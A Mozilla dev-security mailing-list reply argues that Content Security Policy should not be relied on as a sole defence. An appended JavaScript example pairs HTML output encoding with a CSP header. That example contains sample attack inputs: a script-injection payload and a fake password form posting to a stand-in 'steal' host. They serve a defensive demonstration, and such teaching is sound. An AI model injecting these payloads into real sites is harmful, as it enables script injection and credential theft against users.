Lucas Adamski wrote:
> Well, I think any security feature/model has to have some properties
> that are reliable.  So CSP may not prevent XSS in the blanket sense, but
> it still needs to be able to enforce some set of restrictions that the
> developer can rely upon.

Your second sentence doesn't follow from your first, in this context.

Yes, if CSP promises it'll prevent exact attack scenario X, it should
prevent X, and if it doesn't prevent X, it's a bug. (But all that's
really saying is that it's deterministic.) No, that doesn't mean that
developers should rely on a particular browser preventing attack X.
There may be a bug, the user may have turned it off, there may be a very
similar attack Y using the same flaw which CSP can't prevent, and so on.

Gerv
_______________________________________________
dev-security mailing list
[email protected]
https://lists.mozilla.org/listinfo/dev-security
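The point Gerv is making, as an added example that is not part of the original thread: the server keeps its own control (contextual output encoding) as the thing it relies on, and sends a CSP header as a second layer that a conforming browser may or may not enforce. The handler, the `headersOut` object standing in for a real response, and the `name` parameter are assumptions made for illustration; the injected string is constructed.

```javascript
// Added example, not from the mailing list post. Demonstrates CSP as a
// second layer behind a control the server itself owns.

// Primary control: contextual HTML output encoding. This is what the
// developer relies on, regardless of which browser renders the page or
// whether the user has disabled CSP enforcement.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Secondary control: a CSP that refuses inline script and remote script
// hosts. If an encoding bug slips through, a *conforming* browser with CSP
// enabled will not execute an injected <script>, but nothing here depends
// on that happening.
const CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Hypothetical page fragment that reflects user input (assumed parameter).
function renderGreeting(name) {
  return `<p>Hello, ${escapeHtml(name)}</p>`;
}

// Hypothetical request handler; headersOut stands in for a response object.
function handleRequest(query, headersOut) {
  headersOut['Content-Security-Policy'] = CSP;
  return renderGreeting(query.name);
}

// Constructed inputs. The first is "attack X": script injection, which CSP
// would block in a conforming browser. The second is "attack Y": markup
// injection with no script at all (a fake login form), which the same flaw
// permits and CSP does nothing about. Encoding neutralises both.
const SCRIPT_PAYLOAD = '<script>alert(1)</script>';
const MARKUP_PAYLOAD = '<form action="https://example.invalid/steal">Re-enter password:<input name=p></form>';

// Returns true when the rendered output contains no un-encoded tag from the
// input, i.e. the server-side control held on its own.
function neutralised(payload) {
  const out = renderGreeting(payload);
  return !out.includes('<script') && !out.includes('<form') && !out.includes('<input');
}
```

Usage: `handleRequest({ name: SCRIPT_PAYLOAD }, headers)` returns the encoded fragment and sets the CSP header on `headers`; `neutralised(MARKUP_PAYLOAD)` shows the encoding also covers the variant that CSP cannot.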
